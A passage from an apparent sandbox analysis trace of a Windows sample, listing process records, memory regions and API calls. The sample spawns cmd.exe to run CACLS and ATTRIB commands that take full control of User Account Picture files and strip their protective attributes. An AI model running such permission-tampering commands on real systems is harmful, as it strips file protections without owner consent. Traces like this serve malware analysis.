lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2ef57c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef5c8 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\"", lpProcessInformation=0x2ef5c8*(hProcess=0x4c, hThread=0x50, dwProcessId=0x828, dwThreadId=0xfdc)) returned 1 [0189.200] CloseHandle (hObject=0x50) returned 1 [0189.200] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0189.200] GetEnvironmentStringsW () returned 0x412410* [0189.201] FreeEnvironmentStringsW (penv=0x412410) returned 1 [0189.201] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0189.239] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2ef4bc | out: lpExitCode=0x2ef4bc*=0x0) returned 1 [0189.239] CloseHandle (hObject=0x4c) returned 1 [0189.239] _vsnwprintf (in: _Buffer=0x2ef604, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ef4c8 | out: _Buffer="00000000") returned 8 [0189.239] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0189.239] GetEnvironmentStringsW () returned 0x412410* [0189.240] FreeEnvironmentStringsW (penv=0x412410) returned 1 [0189.240] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0189.240] GetEnvironmentStringsW () returned 0x412410* [0189.240] FreeEnvironmentStringsW (penv=0x412410) returned 1 [0189.240] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef520 | out: lpAttributeList=0x2ef520) [0189.240] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.240] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0189.240] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.240] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0189.240] _get_osfhandle (_FileHandle=0) returned 0x3 [0189.240] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0189.240] SetConsoleInputExeNameW () returned 0x1 [0189.240] GetConsoleOutputCP () returned 0x1b5 [0189.240] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0189.240] SetThreadUILanguage (LangId=0x0) returned 0x409 [0189.240] exit (_Code=0) Process: id = "410" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16c20" os_pid = "0xf98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "409" os_parent_pid = "0x114" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27527 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27528 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27529 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27530 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 27531 start_va = 0x860000 end_va = 0x868fff entry_point = 0x860000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 27532 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27533 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27534 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27535 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 27536 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27537 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27538 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27539 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27540 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 27541 start_va = 0x3f0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 27542 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27543 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27544 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27545 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27546 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27547 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27548 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 583 os_tid = 0x7ec Thread: id = 584 os_tid = 0x3a4 Process: id = "411" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16ca0" os_pid = "0x828" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "409" os_parent_pid = "0x114" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27549 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27550 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27551 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27552 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 27553 start_va = 0xd80000 end_va = 0xd86fff entry_point = 0xd80000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 27554 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27555 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27556 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27557 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 27558 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27559 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27560 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27561 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27562 start_va = 0x150000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 27563 start_va = 0x160000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 27564 start_va = 0x6dea0000 end_va = 0x6debcfff entry_point = 0x6dea0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 27565 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27566 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27567 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27568 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27569 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27570 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27571 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27572 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27573 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27574 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27575 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27576 start_va = 0x260000 end_va = 0x327fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 27577 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27578 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 585 os_tid = 0xfdc Process: id = "412" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c40" os_pid = "0x9a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27579 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27580 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27581 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27582 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 27583 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 27584 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27585 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27586 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27587 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 27588 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27589 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27590 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27591 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27592 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 27593 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 27594 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 27595 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27596 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27597 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27598 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27599 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27600 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27601 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27602 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27603 start_va = 0x490000 end_va = 0x557fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 27604 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27605 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 27606 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 27607 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 27608 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 27609 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 27610 start_va = 0x560000 end_va = 0x660fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 27611 start_va = 0x670000 end_va = 0x126ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 27612 start_va = 0x1270000 end_va = 0x13d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001270000" filename = "" Region: id = 27613 start_va = 0x13e0000 end_va = 0x16aefff entry_point = 0x13e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 586 os_tid = 0x90 [0189.289] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1af81c | out: lpSystemTimeAsFileTime=0x1af81c*(dwLowDateTime=0xa5badaa0, dwHighDateTime=0x1d440a9)) [0189.289] GetCurrentProcessId () returned 0x9a8 [0189.289] GetCurrentThreadId () returned 0x90 [0189.289] GetTickCount () returned 0x35f5e [0189.289] QueryPerformanceCounter (in: lpPerformanceCount=0x1af814 | out: lpPerformanceCount=0x1af814*=24607828930) returned 1 [0189.290] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0189.290] __set_app_type (_Type=0x1) [0189.290] __p__fmode () returned 0x76b331f4 [0189.290] __p__commode () returned 0x76b331fc [0189.290] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0189.290] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0189.290] GetCurrentThreadId () returned 0x90 [0189.290] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x90) returned 0x38 [0189.290] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0189.290] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0189.290] SetThreadUILanguage (LangId=0x0) returned 0x409 [0189.290] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0189.290] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1af7ac | out: phkResult=0x1af7ac*=0x0) returned 0x2 [0189.290] VirtualQuery (in: lpAddress=0x1af7e3, lpBuffer=0x1af77c, dwLength=0x1c | out: lpBuffer=0x1af77c*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0189.290] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1af77c, dwLength=0x1c | out: lpBuffer=0x1af77c*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0189.291] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1af77c, dwLength=0x1c | out: lpBuffer=0x1af77c*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0189.291] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1af77c, dwLength=0x1c | out: lpBuffer=0x1af77c*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0189.291] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1af77c, dwLength=0x1c | out: lpBuffer=0x1af77c*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0189.291] GetConsoleOutputCP () returned 0x1b5 [0189.291] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0189.291] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0189.291] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.291] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0189.291] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.291] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0189.291] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.291] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0189.291] _get_osfhandle (_FileHandle=0) returned 0x3 [0189.291] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0189.292] _get_osfhandle (_FileHandle=0) returned 0x3 [0189.292] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0189.292] GetEnvironmentStringsW () returned 0x3a0308* [0189.292] FreeEnvironmentStringsW (penv=0x3a0308) returned 1 [0189.292] GetEnvironmentStringsW () returned 0x3a0308* [0189.292] FreeEnvironmentStringsW (penv=0x3a0308) returned 1 [0189.292] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae71c | out: phkResult=0x1ae71c*=0x40) returned 0x0 [0189.292] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae724, lpData=0x1ae728, lpcbData=0x1ae720*=0x1000 | out: lpType=0x1ae724*=0x0, lpData=0x1ae728*=0xb8, lpcbData=0x1ae720*=0x1000) returned 0x2 [0189.292] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae724, lpData=0x1ae728, lpcbData=0x1ae720*=0x1000 | out: lpType=0x1ae724*=0x4, lpData=0x1ae728*=0x1, lpcbData=0x1ae720*=0x4) returned 0x0 [0189.292] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae724, lpData=0x1ae728, lpcbData=0x1ae720*=0x1000 | out: lpType=0x1ae724*=0x0, lpData=0x1ae728*=0x1, lpcbData=0x1ae720*=0x1000) returned 0x2 [0189.292] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae724, lpData=0x1ae728, lpcbData=0x1ae720*=0x1000 | out: lpType=0x1ae724*=0x4, lpData=0x1ae728*=0x0, lpcbData=0x1ae720*=0x4) returned 0x0 [0189.292] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae724, lpData=0x1ae728, lpcbData=0x1ae720*=0x1000 | out: lpType=0x1ae724*=0x4, lpData=0x1ae728*=0x40, lpcbData=0x1ae720*=0x4) returned 0x0 [0189.292] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae724, lpData=0x1ae728, lpcbData=0x1ae720*=0x1000 | out: lpType=0x1ae724*=0x4, lpData=0x1ae728*=0x40, lpcbData=0x1ae720*=0x4) returned 0x0 [0189.292] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae724, lpData=0x1ae728, lpcbData=0x1ae720*=0x1000 | out: lpType=0x1ae724*=0x0, lpData=0x1ae728*=0x40, lpcbData=0x1ae720*=0x1000) returned 0x2 [0189.292] RegCloseKey (hKey=0x40) returned 0x0 [0189.292] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae71c | out: phkResult=0x1ae71c*=0x40) returned 0x0 [0189.292] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae724, lpData=0x1ae728, lpcbData=0x1ae720*=0x1000 | out: lpType=0x1ae724*=0x0, lpData=0x1ae728*=0x40, lpcbData=0x1ae720*=0x1000) returned 0x2 [0189.292] RegQueryValueExW (in: 